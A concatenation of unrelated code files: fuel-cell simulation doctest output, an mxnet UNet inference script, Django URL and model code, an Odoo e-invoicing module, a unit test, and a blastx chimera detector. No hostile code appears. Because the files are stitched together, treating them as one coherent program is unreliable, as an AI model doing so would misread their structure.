FC Power : 10.860858468594623 W
FC Voltage : 4.022540173553564 V
Loss : 0.4091670656092947 V
PH2 : 0.19680543241082776 atm
PH2O : 0.24223352788415034 atm
PO2 : 0.190420114845142 atm
Power-Thermal : 5.744141531405379 W
###########
I : 2.8
E : 6.068373962362936 V
Eta Activation : 0.40621862980268425 V
Eta Concentration : 0.0006014130823336223 V
Eta Ohmic : 0.004957160562216277 V
FC Efficiency : 0.5140369160418929
FC Power : 11.226566246354942 W
FC Voltage : 4.009487945126765 V
Loss : 0.4117772034472342 V
PH2 : 0.1967913820292134 atm
PH2O : 0.2422162342888218 atm
PO2 : 0.19041218200694368 atm
Power-Thermal : 5.993433753645058 W
###########
I : 2.9
E : 6.068372423061707 V
Eta Activation : 0.4085437792118771 V
Eta Concentration : 0.0006233158920510905 V
Eta Ohmic : 0.005135904406545483 V
FC Efficiency : 0.5124176186550433
FC Power : 11.590886533977079 W
FC Voltage : 3.996857425509338 V
Loss : 0.4143029995104737 V
PH2 : 0.196777331647599 atm
PH2O : 0.24219894069349326 atm
PO2 : 0.1904042491687454 atm
Power-Thermal : 6.244113466022921 W
###########
I : 3.0
E : 6.0683708836963435 V
Eta Activation : 0.4107901672807063 V
Eta Concentration : 0.0006452487261915484 V
Eta Ohmic : 0.005314768076451755 V
FC Efficiency : 0.5108487132409738
FC Power : 11.953859889838787 W
FC Voltage : 3.9846199632795956 V
Loss : 0.4167501840833496 V
PH2 : 0.1967632812659846 atm
PH2O : 0.24218164709816473 atm
PO2 : 0.19039631633054707 atm
Power-Thermal : 6.496140110161214 W
###########
I : 3.1
E : 6.068369344266841 V
Eta Activation : 0.4129629601316751 V
Eta Concentration : 0.0006672116671831024 V
Eta Ohmic : 0.0054937518419525275 V
FC Efficiency : 0.5093268879567676
FC Power : 12.315524150794642 W
FC Voltage : 3.9727497260627875 V
Loss : 0.41912392364081075 V
PH2 : 0.19674923088437024 atm
PH2O : 0.2421643535028362 atm
PO2 : 0.1903883834923488 atm
Power-Thermal : 6.74947584920536 W
###########
I : 3.2
E : 6.068367804773196 V
Eta Activation : 0.41506683170178466 V
Eta Concentration : 0.0006892047977937692 V
Eta Ohmic : 0.005672855976278701 V
FC Efficiency : 0.5078491464607577
FC Power : 12.675914695660513 W
FC Voltage : 3.96122334239391 V
Loss : 0.42142889247585713 V
PH2 : 0.19673518050275585 atm
PH2O : 0.24214705990750765 atm
PO2 : 0.19038045065415046 atm
Power-Thermal : 7.0040853043394895 W
###########
I : 3.3
E : 6.0683662652154 V
Eta Activation : 0.417106024344736 V
Eta Concentration : 0.0007112282011333409 V
Eta Ohmic : 0.005852080755831333 V
FC Efficiency : 0.5064127690649867
FC Power : 13.035064675732759 W
FC Voltage : 3.9500195987068967 V
Loss : 0.42366933330170065 V
PH2 : 0.19672113012114145 atm
PH2O : 0.2421297663121791 atm
PO2 : 0.19037251781595219 atm
Power-Thermal : 7.259935324267242 W
###########
I : 3.4
E : 6.06836472559345 V
Eta Activation : 0.4190844003836543 V
Eta Concentration : 0.0007332819606552831 V
Eta Ohmic : 0.0060314264601405215 V
FC Efficiency : 0.5050152796886153
FC Power : 13.393005217342077 W
FC Voltage : 3.9391191815711992 V
Loss : 0.42584910880445015 V
PH2 : 0.19670707973952706 atm
PH2O : 0.24211247271685057 atm
PO2 : 0.19036458497775385 atm
Power-Thermal : 7.516994782657924 W
###########
I : 3.5
E : 6.068363185907339 V
Eta Activation : 0.42100548618901656 V
Eta Concentration : 0.0007553661601586168 V
Eta Ohmic : 0.006210893371826288 V
FC Efficiency : 0.503654417602863
FC Power : 13.74976560055816 W
FC Voltage : 3.9285044573023313 V
Loss : 0.4279717457210015 V
PH2 : 0.1966930293579127 atm
PH2O : 0.24209517912152204 atm
PO2 : 0.19035665213955555 atm
Power-Thermal : 7.775234399441842 W
###########
I : 3.6
E : 6.068361646157063 V
Eta Activation : 0.4228725100457559 V
Eta Concentration : 0.000777480883789843 V
Eta Ohmic : 0.006390481776561363 V
FC Efficiency : 0.5023281131572472
FC Power : 14.105373417455501 W
FC Voltage : 3.918159282626528 V
Loss : 0.43004047270610707 V
PH2 : 0.1966789789762983 atm
PH2O : 0.2420778855261935 atm
PO2 : 0.19034871930135727 atm
Power-Thermal : 8.034626582544501 W
###########
I : 3.7
E : 6.068360106342617 V
Eta Activation : 0.4246884348310017 V
Eta Concentration : 0.0007996262160448594 V
Eta Ohmic : 0.00657019196303564 V
FC Efficiency : 0.501034466832334
FC Power : 14.459854712781162 W
FC Voltage : 3.9080688412922058 V
Loss : 0.4320582530100822 V
PH2 : 0.1966649285946839 atm
PH2O : 0.24206059193086493 atm
PO2 : 0.19034078646315894 atm
Power-Thermal : 8.29514528721884 W
###########
I : 3.8
E : 6.068358566463993 V
Eta Activation : 0.4264559863331208 V
Eta Concentration : 0.0008218022417708932 V
Eta Ohmic : 0.006750024222922298 V
FC Efficiency : 0.4997717310865285
FC Power : 14.813234109404705 W
FC Voltage : 3.8982195024749227 V
Loss : 0.43402781279781405 V
PH2 : 0.19665087821306954 atm
PH2O : 0.2420432983355364 atm
PO2 : 0.19033285362496066 atm
Power-Thermal : 8.556765890595296 W
###########
I : 3.9
E : 6.068357026521189 V
Eta Activation : 0.42817767789163225 V
Eta Concentration : 0.0008440090461684635 V
Eta Ohmic : 0.006929978850845375 V
FC Efficiency : 0.49853829456127663
FC Power : 15.165534920554036 W
FC Voltage : 3.888598697577958 V
Loss : 0.4359516657886461 V
PH2 : 0.19663682783145514 atm
PH2O : 0.24202600474020786 atm
PO2 : 0.19032492078676233 atm
Power-Thermal : 8.819465079445965 W
###########
Report is generating ...
Done!
>>> Padulles_Amphlett_Data["Status"]
True
>>> Padulles_Amphlett_Data["P"][5]
2.72491286817189
>>> Padulles_Amphlett_Data["I"][5]
0.6
>>> Padulles_Amphlett_Data["V"][5]
4.54152144695315
>>> Padulles_Amphlett_Data["EFF"][5]
0.582246339352968
>>> Padulles_Amphlett_Data["PO2"][5]
0.1905867044473064
>>> Padulles_Amphlett_Data["PH2"][5]
0.19710049042472996
>>> Padulles_Amphlett_Data["PH2O"][5]
0.2425966933860498
>>> Padulles_Amphlett_Data["Ph"][5]
0.9650871318281099
>>> Padulles_Amphlett_Data["VE"][5]
4.553477553120023
>>> Padulles_Amphlett_Data["V0"]
4.698328442367755
>>> Padulles_Amphlett_Data["K"]
-0.24141814874622033
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)
>>> Padulles_Amphlett_Data["Status"]
False
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)
2.9
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)
[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":2,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"B":234,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":5,"i-stop":0.1,"i-step":-2,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.14455344314445 V
Eta Activation : 0.9092187394310518 V
Eta Concentration : 0.3085036702624245 V
Eta Ohmic : 4.63717533307516e+269 V
FC Efficiency : -2.9725482904327946e+269
FC Power : -2.3185876665375803e+269 W
FC Voltage : -2.3185876665375803e+270 V
Loss : 4.63717533307516e+269 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 2.3185876665375803e+269 W
###########
I : 2.0
E : 6.144553272737403 V
Eta Activation : 0.9103753288368093 V
Eta Concentration : 6.248702408698187 V
Eta Ohmic : 9.331810347802308e+270 V
FC Efficiency : -5.981929710129684e+270
FC Power : -9.331810347802308e+271 W
FC Voltage : -4.665905173901154e+271 V
Loss : 9.331810347802308e+270 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 9.331810347802308e+271 W
###########
I : 4.0
E : 6.144553093215826 V
Eta Activation : 0.9106431331307118 V
Eta Concentration : 12.668858203852476 V
Eta Ohmic : 1.8785852500552963e+271 V
FC Efficiency : -1.2042213141380103e+271
FC Power : -3.757170500110593e+272 W
FC Voltage : -9.392926250276482e+271 V
Loss : 1.8785852500552963e+271 V
PH2 : 0.19662277744984075 atm
PH2O : 0.24200871114487932 atm
PO2 : 0.19031698794856405 atm
Power-Thermal : 3.757170500110593e+272 W
###########
Report is generating ...
Warning : The value of I(>0.1) leads to minus amount of V, please check your inputs
Done!
>>> shutil.rmtree("Padulles-Amphlett")
'''
|
import mxnet as mx
from mxnet import gluon
from mx_model import ModelUNet
import os
import numpy as np
from mxnet import nd
from mxnet import image
from skimage import io
from tqdm import tqdm
import multiprocessing
import warnings
import cv2
class TestDataSet(gluon.data.Dataset):
    """Dataset yielding, per test sample, the last 15 radar frames plus a
    gradient-magnitude channel per frame, scaled by 1/data_scale and laid
    out channels-first as an mxnet NDArray.
    """

    def __init__(self, samples, channel_in=15, channel_out=2, **kwargs):
        super(TestDataSet, self).__init__(**kwargs)
        self.data_root = '../nas/SRAD2018/SRAD2018_Test_2/'
        self.data_scale = 80          # divisor normalizing raw pixel values
        self.channel_in = channel_in
        self.channel_out = channel_out
        self.samples = samples        # list of sample folder names

    def __getitem__(self, idx):
        sample = self.samples[idx]
        sample_root = self.data_root + sample
        img_names = [im for im in os.listdir(sample_root) if 'png' in im]
        # Every sample folder is expected to hold exactly 31 frames.
        if len(img_names) != 31:
            print(self.data_root + sample, 'have {} images. not equal 31.'.format(len(img_names)))
            exit(0)
        # Sort frames by their trailing 3-digit index and keep the last 15.
        img_names = sorted(img_names, key=lambda x: int(x[-7:-4]))[-15:]
        dt = []
        for name in img_names:
            tp = cv2.imread(sample_root + '/' + name, cv2.IMREAD_GRAYSCALE)[:, :, np.newaxis]
            tp[tp == 255] = 0   # 255 marks missing radar data; zero it out
            dt.append(tp)
        dd = np.concatenate(tuple(dt), axis=-1)
        # BUG FIX: cv2.Sobel's 5th positional argument is `dst`, not the
        # kernel size; the original passed 5 as dst. Pass ksize by keyword.
        gx = cv2.Sobel(dd, cv2.CV_16S, 1, 0, ksize=5)
        gy = cv2.Sobel(dd, cv2.CV_16S, 0, 1, ksize=5)
        gx = cv2.convertScaleAbs(gx)
        gy = cv2.convertScaleAbs(gy)
        g = np.sqrt(gx * gx + gy * gy)
        # Stack raw frames and gradient channels, then move channels first.
        dd = np.concatenate((dd, g), axis=-1).transpose([2, 0, 1])
        dd = nd.array(dd)
        return dd.astype(np.float32) / self.data_scale

    def __len__(self):
        return len(self.samples)
def infer(samples, out_channel=3):
    """Run the UNet over each sample folder and write six predicted PNG
    frames per sample; frames beyond the model's output channels reuse
    the last channel. Results go under save_path/<sample>/.
    """
    # Disable cudnn autotune for deterministic start-up time.
    os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0'
    save_path = '../nas/SRAD2018Model/result/unet_grad/'
    os.makedirs(save_path, exist_ok=True)
    # batch_size=1 keeps the loader index aligned with the samples list,
    # which the save loop below relies on.
    test_loader = gluon.data.DataLoader(TestDataSet(samples), batch_size=1, )
    print('sample num: ', len(samples))
    context = mx.gpu(1)
    model = ModelUNet(out_channels=out_channel)
    print('modle built !')
    model.load_parameters('../nas/SRAD2018Model/weights/mx_ModelUNet_1to3_grad_epoch_45.param', ctx=context)
    print('param loaded')
    with warnings.catch_warnings():
        warnings.simplefilter('ignore')
        for idx, dt in tqdm(enumerate(test_loader)):
            os.makedirs(save_path+samples[idx], exist_ok=True)
            # print(idx, samples[idx])
            out = model(dt.as_in_context(context))
            # Undo the 1/80 input scaling, clamp to byte range.
            out = np.clip(np.round(out.asnumpy()*80), 0, 255).astype(np.uint8)
            # 0 means "missing" in the source data; restore the 255 marker.
            out[out == 0] = 255
            for i in range(6): #
                # Reuse the last predicted channel for frames past out_channel.
                j = i if i < out_channel else out_channel-1
                io.imsave(save_path+samples[idx]+'/{}_f{:03d}.png'.format(samples[idx], i+1), out[0, j, :, :])
    print('done')
if __name__ == '__main__':
    data_root = '../nas/SRAD2018/SRAD2018_Test_2/'
    # Every subdirectory of data_root is one test sample.
    sps = sorted([sp for sp in os.listdir(data_root) if os.path.isdir(data_root + sp)])
    # Split samples into chunks of 1000; each pool round runs up to 4 chunks.
    smps = [sps[i:i+1000] for i in range(0, len(sps), 1000)]
    while smps:
        pools = multiprocessing.Pool(4)
        # BUG FIX: bound the pops by the chunks remaining — the original
        # popped 4 unconditionally and raised IndexError when fewer than
        # 4 chunks were left on the final round.
        for _ in range(min(4, len(smps))):
            pools.apply_async(infer, args=(smps.pop(0), ))
        pools.close()
        pools.join()
|
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth import views as auth_views
# URL configuration: admin, core app catch-all, accounts app, and the
# built-in password-reset flow.
urlpatterns = [
    # Admin
    url(r'^admin/', admin.site.urls),
    # Core app
    url(r'^', include('apps.core.urls', namespace='core')),
    # Accounts app
    url(r'^accounts/', include('apps.accounts.urls', namespace='accounts')),
    # NOTE(review): the reset patterns below are missing the '^' anchor,
    # so they match any path ending in e.g. 'reset/' — confirm whether
    # they should be anchored like the routes above.
    url(
        r'reset/$',
        auth_views.PasswordResetView.as_view(),
        name='password_reset'
    ),
    url(
        r'reset/done/$',
        auth_views.PasswordResetDoneView.as_view(),
        name='password_reset_done'
    ),
    # uidb64/token pair produced by Django's password-reset email.
    url(
        r'reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
        auth_views.PasswordResetConfirmView.as_view(),
        name='password_reset_confirm'
    ),
    url(
        r'reset/complete/$',
        auth_views.PasswordResetCompleteView.as_view(),
        name='password_reset_complete'
    ),
]
|
def _ticket_price(idade):
    """Ticket price in reais: 10 up to age 5, 15 from age 60, 25 otherwise."""
    if idade <= 5:
        return 10
    if idade >= 60:
        return 15
    return 25

# Ask for the user's age and report the fare for their bracket.
idade = int(input('Digite sua idade :'))
valor = _ticket_price(idade)
print('Você pagara {} reais'.format(valor))
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import base64
import zipfile
import io
from requests.exceptions import ConnectionError, HTTPError, InvalidSchema, InvalidURL, ReadTimeout
from zeep.wsse.username import UsernameToken
from zeep import Client, Settings
from zeep.exceptions import Fault
from zeep.transports import Transport
from lxml import etree
from lxml.objectify import fromstring
from copy import deepcopy
from odoo import models, fields, api, _, _lt
from ..tools.facturaonline import facturaonline_jsonrpc
from ..tools.facturaonline import facturaonline_convert_data
from odoo.tools.pdf import OdooPdfFileReader, OdooPdfFileWriter
from odoo.exceptions import AccessError
from odoo.tools import html_escape
class AccountEdiFormat(models.Model):
    """Extends account.edi.format with facturaonline.pe signing for
    Peruvian electronic invoicing, plus PDF-embedding overrides."""
    _inherit = 'account.edi.format'

    def _l10n_pe_edi_sign_invoices_facturaonline(self, invoice, edi_filename, edi_str):
        """Send the invoice's EDI payload to facturaonline.pe over JSON-RPC
        and return the raw service response."""
        #_l10n_pe_edi_sign_invoices_iap
        credentials = self._l10n_pe_edi_get_sunat_facturaonline(invoice.company_id)
        url = self.get_url_facturaonline(invoice)
        edi_values = self._l10n_pe_edi_get_edi_values(invoice)
        data_values = facturaonline_convert_data(invoice,edi_values)
        result = facturaonline_jsonrpc(url, params=data_values, credentials=credentials, timeout=1500)
        #result = iap_jsonrpc(url, params=rpc_params, timeout=1500)
        #message = "Factura creada en facturaonline.pe " + "id de Factura " + result.get("idFactura")
        return result

    def _l10n_pe_edi_get_sunat_facturaonline(self, company):
        """Collect the facturaonline credentials configured on the company."""
        self.ensure_one()
        res = {}
        # NOTE(review): keys 'enpoint' and 'acces_key' are misspelled
        # ('endpoint'/'access_key') — consumers read these exact keys, so
        # renaming requires a coordinated change; left as-is.
        res.update({
            'enpoint': company.l10n_pe_edi_endpoint_facturaonline,
            'acces_key': company.l10n_pe_edi_acces_key,
            'secret_key': company.l10n_pe_edi_secret_key,
        })
        return res

    def get_url_facturaonline(self, invoice):
        """Return the service endpoint for the invoice's SUNAT document
        type: 01 factura, 03 boleta, 07 credit note, 08 debit note.
        Any other code falls through to the bare company endpoint."""
        url = invoice.company_id.l10n_pe_edi_endpoint_facturaonline
        if invoice.l10n_latam_document_type_id.code == '01':
            url = url + '/factura'
        if invoice.l10n_latam_document_type_id.code == '03':
            url = url + '/boleta'
        if invoice.l10n_latam_document_type_id.code == '07':
            url = url + '/notacredito'
        if invoice.l10n_latam_document_type_id.code == '08':
            url = url + '/notadebito'
        return url

    def _get_embedding_to_invoice_pdf_values(self, invoice):
        """ Get the values to embed to pdf.
        Tries, in order: the stored pdf_invoice binary, a freshly generated
        print, then the EDI attachment record.
        :returns: A dictionary {'name': name, 'datas': datas} or False if there are no values to embed.
        * name: The name of the file.
        * datas: The bytes of the file.
        """
        self.ensure_one()
        redn = self._is_embedding_to_invoice_pdf_needed()
        if not redn:
            return False
        if invoice.pdf_invoice:
            datas = base64.b64decode(invoice.pdf_invoice)
            return {'name': invoice.pdf_name_invoice, 'datas': datas}
        else:
            gen = invoice.generate_invoice_print()
            if gen:
                return gen
        # Fallback: use the attachment produced by the EDI flow.
        attachment = invoice._get_edi_attachment(self)
        if not attachment or not self._is_embedding_to_invoice_pdf_needed():
            return False
        # bin_size=False forces the real binary content, not its size.
        datas = base64.b64decode(attachment.with_context(bin_size=False).datas)
        return {'name': attachment.name, 'datas': datas}

    def _embed_edis_to_pdf(self, pdf_content, invoice):
        """ Create the EDI document of the invoice and embed it in the pdf_content.
        :param pdf_content: the bytes representing the pdf to add the EDIs to.
        :param invoice: the invoice to generate the EDI from.
        :returns: the same pdf_content with the EDI of the invoice embed in it.
        """
        attachments = []
        for edi_format in self.filtered(lambda edi_format: edi_format._is_embedding_to_invoice_pdf_needed()):
            attach = edi_format._get_embedding_to_invoice_pdf_values(invoice)
            if attach:
                attachments.append(attach)
        if attachments:
            # Add the attachments to the pdf file
            # NOTE(review): `attach` here is the leaked loop variable — the
            # LAST format's values (possibly False) are used as the base
            # PDF instead of pdf_content, and the addAttachment loop is
            # commented out. Confirm whether replacing the PDF with the
            # attachment is intended.
            reader_buffer = io.BytesIO(attach['datas'])
            reader = OdooPdfFileReader(reader_buffer, strict=False)
            writer = OdooPdfFileWriter()
            writer.cloneReaderDocumentRoot(reader)
            # for vals in attachments:
            #     writer.addAttachment(vals['name'], vals['datas'])
            buffer = io.BytesIO()
            writer.write(buffer)
            pdf_content = buffer.getvalue()
            reader_buffer.close()
            buffer.close()
        return pdf_content
import unittest
from luminol import exceptions
from luminol import Luminol
class TestLuminol(unittest.TestCase):
    """Smoke tests for Luminol's root-cause ranking API."""

    def setUp(self):
        # Two anomalies, each with its own ranking of correlated metrics.
        self.anomaly = ['A', 'B']
        self.correlation = {'A': ['m1', 'm2', 'm3'], 'B': ['m2', 'm1', 'm3']}
        self.luminol = Luminol(self.anomaly, self.correlation)

    def test_get_result(self):
        causes = self.luminol.get_root_causes()
        # Result maps each anomaly to its top-ranked correlated metric.
        self.assertTrue(isinstance(causes, dict))
        self.assertEqual(causes['A'], 'm1')
        self.assertEqual(causes['B'], 'm2')
# if __name__ == '__main__':
# unittest.main()
|
"""
The blastx output files must have a customized tabular output:
0-qseqid 1-qlen 2-seqid 3-slen 4-frame 5-pident
6-nident 7-length 8-mismatch 9-gapopen 10-qstart 11-qend
12-start 13-send 14-evalue 15-bitscore
Step 1: only look at HSPs that are long and sufficiently similar to the query
Step 2: check a block of HSPs from a query-hit pair (hit_block) for self chimeras
Step 3: check a block of HSPs from the same query (query_block) for multi-gene chimeras
	if no self chimera was detected. Output two cut ranges with a and b after the names
output a ".cut" file for position to cut, and a ".info" file for validating cuts
Modify the PIDENT_CUTOFF and LENGTH_CUTOFF as needed for each data set
The difference between "trans-multi" vs. "trans-self" is only meaningful when
the blast database is from a single species
"""
import sys,os
PIDENT_CUTOFF = 30 #only look at HSPs >= this percentage similarity
LENGTH_CUTOFF = 100 #only look at HSPs >= this length
#calculate length of query coverage
def qcov(hsp):
    """Length of the query region covered by this HSP (inclusive span
    between columns 10 (qstart) and 11 (qend), either orientation)."""
    qstart, qend = hsp[10], hsp[11]
    return abs(qend - qstart) + 1
#given two hsps, return True if their
#overlap is less than 20% of the shorter HSP and less than 60 bp
def separated(hsp1, hsp2):
    """True when the two HSPs cover nearly disjoint query regions: their
    overlap is below both 60 bp and 20% of the shorter HSP's coverage."""
    len_a = qcov(hsp1)
    len_b = qcov(hsp2)
    span_lo = min(hsp1[10], hsp1[11], hsp2[10], hsp2[11])
    span_hi = max(hsp1[10], hsp1[11], hsp2[10], hsp2[11])
    # Can go negative when the HSPs are far apart; only the upper bound matters.
    overlap = len_a + len_b - (span_hi - span_lo) + 1
    return overlap < min(60, 0.2 * min(len_a, len_b))
#expand query range given two hsps of the same query-hit pair
#both hsps are the same direction
def expand_range(hsp1, hsp2):
    """Merge the query ranges of two HSPs from the same query-hit pair,
    widening hsp1's qstart/qend (columns 10/11) in place and returning it.

    Both HSPs are expected to share a direction; when their directions
    differ, hsp1 is returned unchanged, as the original comment intended.
    Either argument may be [] (the empty accumulator), in which case the
    other is returned as-is.

    BUG FIX: the original assigned `hsp1[10], hsp1[11] = start, end`
    unconditionally, so the opposite-direction case raised NameError
    because neither branch had bound start/end.
    """
    if hsp1 == []:
        return hsp2
    if hsp2 == []:
        return hsp1
    start1, end1, start2, end2 = hsp1[10], hsp1[11], hsp2[10], hsp2[11]
    if start1 < end1 and start2 < end2:      # both forward
        hsp1[10], hsp1[11] = min(start1, start2), max(end1, end2)
    elif start1 > end1 and start2 > end2:    # both reverse
        hsp1[10], hsp1[11] = max(start1, start2), min(end1, end2)
    # opposite directions: leave hsp1 unchanged
    return hsp1
#detect chimera from a block of hits
#block can be a query-hit block (only check for self-chimera)
#or block can be a query block (check both self and multi-gene chimera)
#return True if no chimera is detected, False if chimera is detected
#also write to out file the combined best HSP
def check_block(block,multigene):
	"""
	Detect a chimera in a block of HSPs.

	block -- list of HSP rows: all from one query+hit pair, or all from one
	query (when multigene is True).
	multigene -- True when the block spans multiple hits; a detected chimera
	is then reported as "trans-multi" with both ranges, otherwise as
	"trans-self" with only the better-covered range.

	Returns True when no chimera is detected, False when one is.
	Side effect on detection: writes the range(s) to cut to the module-level
	global outfile1 (.cut) and the supporting HSPs to outfile2 (.info);
	both are opened in the __main__ section.
	"""
	#only one hsp -> not chimera
	if len(block) == 1: return True
	#summarize all pos and neg HSPs
	#(frame field 4 starts with "-" for reverse-frame HSPs)
	pos,neg = [],[]
	for hsp in block:
		if hsp[4][0] == "-":
			neg = expand_range(neg,hsp)
		else:
			pos = expand_range(pos,hsp)
	#compare pos_hit and neg_hit
	if (pos == [] and neg != []) or (neg == [] and pos != []):
		return True #only has hits of one direction
	elif separated(pos,neg):#has both direction and separate -> chimera!
		#write range to cut
		if multigene: #output both hsps
			start1,end1 = min(pos[10],pos[11]),max(pos[10],pos[11])
			start2,end2 = min(neg[10],neg[11]),max(neg[10],neg[11])
			outfile1.write(pos[0]+" "+str(int(start1))+" "+str(int(end1))+" trans-multi\n")
			outfile1.write(neg[0]+" "+str(int(start2))+" "+str(int(end2))+" trans-multi\n")
		else:
			if qcov(pos) > qcov(neg):
				outhsp = pos #outhsp is the better covered of the two
			else: outhsp = neg
			start,end = min(outhsp[10],outhsp[11]),max(outhsp[10],outhsp[11]) #range to cut
			outfile1.write(outhsp[0]+" "+str(int(start))+" "+str(int(end))+" trans-self\n")
		#write the blastx block to a .info file for visual checking
		for i in pos:
			outfile2.write(str(i)+"\t")
		outfile2.write("\n")
		for i in neg:
			outfile2.write(str(i)+"\t")
		outfile2.write("\n")
		return False
	else:
		return True #has both direction but not separate
if __name__ == "__main__":
	# Command line: the customized blastx tabular file and an output directory.
	if len(sys.argv) != 3:
		# print() works in both Python 2 and 3; the original Python 2
		# print statement is a SyntaxError under Python 3.
		print("usage: python detect_chimera_from_blastx.py blastx_output output_dir")
		sys.exit()
	blastx_output = sys.argv[1]
	DIR = sys.argv[2]
	# Normalize the output directory to an absolute path ending in "/".
	if DIR == ".": DIR = os.getcwd()
	if not os.path.isabs(DIR): DIR = os.path.abspath(DIR)
	if DIR[-1] != "/": DIR += "/"
	path_blastx, file_blastx = os.path.split(blastx_output) #splits the path from the file name
	blastx_base_name = str(file_blastx).split(".")
	infile = open(blastx_output, "r") #"rU" mode was removed in Python 3.11
	# Module-level handles: check_block() writes to these globals.
	outfile1 = open(DIR + blastx_base_name[0] + ".cut", "w")
	outfile2 = open(DIR + blastx_base_name[0] + ".info", "w")
	last_query = ""
	for line in infile:
		if len(line) < 3: continue #ignore empty lines
		hsp = line.strip().split("\t")
		for i in [5, 10, 11]: hsp[i] = float(hsp[i]) #pident, qstart, qend
		if hsp[5] < PIDENT_CUTOFF or qcov(hsp) < LENGTH_CUTOFF:
			continue #ignore low similarity or short HSPs
		query, hit = hsp[0], hsp[2]
		if last_query == "": #at the beginning of a file
			hit_block = [hsp] #all HSPs of the same query and same hit
			query_block = [hsp] #all HSPs from the same query
			good_seq = True #False once a chimera is detected
		elif query == last_query: #continue with the same query
			query_block.append(hsp)
			if good_seq: #only check if no chimera has been detected
				if hit == last_hit:
					hit_block.append(hsp)
				else: #send off the finished hit_block
					good_seq = check_block(hit_block, False)
					hit_block = [hsp]
		else: #starting a new query: flush the previous query's blocks
			if good_seq: #haven't found self chimera
				good_seq = check_block(hit_block, False) #check the last hit block
			if good_seq: #haven't found self chimera
				good_seq = check_block(query_block, True) #look for multi-gene chimera
			query_block, hit_block = [hsp], [hsp]
			good_seq = True
		#keep track of the last line processed
		last_query, last_hit = query, hit
	# Flush the final blocks. Guarded: with no usable HSP the original
	# raised NameError here because good_seq/hit_block were never bound.
	if last_query != "":
		if good_seq: #haven't found self chimera
			good_seq = check_block(hit_block, False)
		if good_seq: #haven't found self chimera
			good_seq = check_block(query_block, True)
	infile.close()
	outfile1.close()
	outfile2.close()
import sqlite3

# Dump every row of the data1 table to stdout.
# One-time schema bootstrap, kept for reference:
#   CREATE TABLE login(id integer primary key autoincrement not null,
#                      user text not null, pass text not null)
#   INSERT INTO login (user, pass) VALUES ('jerin', 'pass')
conn = sqlite3.connect('data.sqlite')
try:
    c = conn.cursor()
    c.execute("select * from data1 ")
    l = c.fetchall()
    print(l)
    conn.commit()
finally:
    # Always release the connection, even when the query fails --
    # the original leaked it on any exception.
    conn.close()
|
# -*- coding: utf-8 -*-
import string
import logging
from django.db import models
from django.db.models import Sum, Count, Avg
from dkp.utils import raid_period, calculate_percent, cached_method, cached_property, QuerySetManager
DATE_FORMAT = '%d.%m.%y'
TIME_FORMAT = '%H:%M'
logger = logging.getLogger('dkp')
class Config(models.Model):
    """Simple key/value store for site-wide configuration entries."""
    name = models.CharField(max_length=100)
    value = models.CharField(max_length=100)
    def __unicode__(self):
        return self.name
class Pool(models.Model):
    """A top-level DKP pool; groups tiers and orders them by `sort`."""
    name = models.CharField(max_length=100, unique=True)
    sort = models.IntegerField()  # display ordering among pools
    def __unicode__(self):
        return self.name
class Tier(models.Model):
    """A raid tier within a pool; aggregates raid DKP totals per period."""
    name = models.CharField(max_length=100)
    pool = models.ForeignKey(Pool)
    sort = models.IntegerField()  # display ordering within the pool
    class Meta:
        """
        Tiers may share a name only across different pools.
        No duplicate sort number within one pool.
        """
        unique_together = (('pool', 'name'), ('pool', 'sort'),)
    def __unicode__(self):
        return u'{}: {}'.format(self.pool.name, self.name)
    @cached_method('Tier_{id}_sum_{period}')
    def sum(self, period=30):
        # Total raid DKP handed out in this tier; period <= 0 means all time.
        base = Raid.objects.filter(event__tier=self.id)
        if period > 0:
            base = base.filter(time__gte=raid_period(period))
        return base.aggregate(Sum('value'))['value__sum'] or 0
    @cached_method('Tier_{id}_count_{period}')
    def count(self, period=30):
        # Number of raids held in this tier; period <= 0 means all time.
        base = Raid.objects.filter(event__tier=self.id)
        if period > 0:
            base = base.filter(time__gte=raid_period(period))
        return base.count()
class Event(models.Model):
    """A raid event (encounter) belonging to a tier."""
    name = models.CharField(max_length=100)
    tier = models.ForeignKey(Tier)
    # presumably: whether this event counts toward attendance -- confirm
    attendance = models.BooleanField(default=True)
    class Meta:
        """
        No two events with the same name within one tier.
        """
        unique_together = ('tier', 'name')
    def __unicode__(self):
        return u'{}'.format(self.name)
    @models.permalink
    def get_absolute_url(self):
        return ('view_event', (), {'tier': self.tier.id, 'eventid': self.id})
class GameRace(models.Model):
    """A playable in-game race."""
    name = models.CharField(max_length=100, unique=True)
    def __unicode__(self):
        return self.name
class GameClass(models.Model):
    """A playable in-game class; `css` is a lowercased, space-free slug of
    the name, regenerated on every save."""
    name = models.CharField(max_length=100, unique=True)
    css = models.CharField(max_length=100)
    def __unicode__(self):
        return self.name
    def save(self, *args, **kwargs):
        # Accept Django's standard save() arguments (force_insert=...,
        # using=..., etc.) -- the original signature save(self) broke them.
        # str.lower() replaces string.lower(), which no longer exists in
        # Python 3.
        self.css = self.name.lower().replace(' ', '')
        super(GameClass, self).save(*args, **kwargs)
class Rank(models.Model):
    """A guild rank (e.g. the 'Out' rank marks members who left)."""
    name = models.CharField(max_length=100, unique=True)
    def __unicode__(self):
        return self.name
class Member(models.Model):
    """A guild member with their in-game race, class and guild rank."""
    name = models.CharField(max_length=100, unique=True)
    note = models.TextField(blank=True)
